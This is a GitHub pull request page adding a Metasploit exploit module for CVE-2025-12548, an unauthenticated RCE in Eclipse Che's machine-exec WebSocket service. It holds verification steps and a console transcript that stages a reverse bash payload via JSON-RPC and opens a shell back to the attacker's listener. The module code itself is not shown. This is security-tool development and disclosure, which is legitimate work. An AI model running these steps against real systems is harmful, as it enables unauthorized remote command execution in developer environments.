Skip to content

Add Eclipse Che machine-exec unauthenticated RCE (CVE-2025-12548) #20835

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
GregDurys wants to merge 3 commits into
base: master
Choose a base branch
from
Open

Add Eclipse Che machine-exec unauthenticated RCE (CVE-2025-12548) #20835

GregDurys wants to merge 3 commits into from
+388 −0

Conversation

@GregDurys
Copy link

@GregDurys GregDurys commented Dec 30, 2025
edited
Loading

This module exploits an unauthenticated RCE vulnerability (CVE-2025-12548) in the Eclipse Che machine-exec service. The service accepts WebSocket connections without authentication on port 3333, allowing command execution via JSON-RPC.

Affects Red Hat OpenShift DevSpaces environments.

Verification

  • Start msfconsole
  • use exploit/linux/http/eclipse_che_machine_exec_rce
  • set RHOSTS <target>
  • set LHOST <your_ip>
  • check
  • exploit
  • Verify you get a shell session

Scenarios

msf6 > use exploit/linux/http/eclipse_che_machine_exec_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > check
[+] 192.168.1.10:3333 - The target is vulnerable. machine-exec service accepts unauthenticated connections
msf6 exploit(linux/http/eclipse_che_machine_exec_rce) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. machine-exec service accepts unauthenticated connections
[*] Connecting to machine-exec service...
[+] Connected to machine-exec service
[*] Staging payload via JSON-RPC create method...
[+] Command staged with process ID: 2
[*] Triggering execution via /attach/2...
[+] Payload triggered!
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:47578) at 2025-12-30 19:46:55 +0000

whoami
user

gregd added 2 commits December 30, 2025 21:14
Add Eclipse Che machine-exec unauthenticated RCE (CVE-2025-12548)
475846e 
This module exploits an unauthenticated RCE vulnerability in the
Eclipse Che machine-exec service. The service accepts WebSocket
connections without authentication on port 3333, allowing command
execution via JSON-RPC.

Affects Red Hat OpenShift DevSpaces environments.
Add meterpreter scenario and redact IPs in documentation
c225256
@GregDurys GregDurys marked this pull request as ready for review January 5, 2026 11:18
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

1 more reviewer

@jvoisin jvoisin jvoisin left review comments

Reviewers whose approvals may not affect merge requirements

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@GregDurys @jvoisin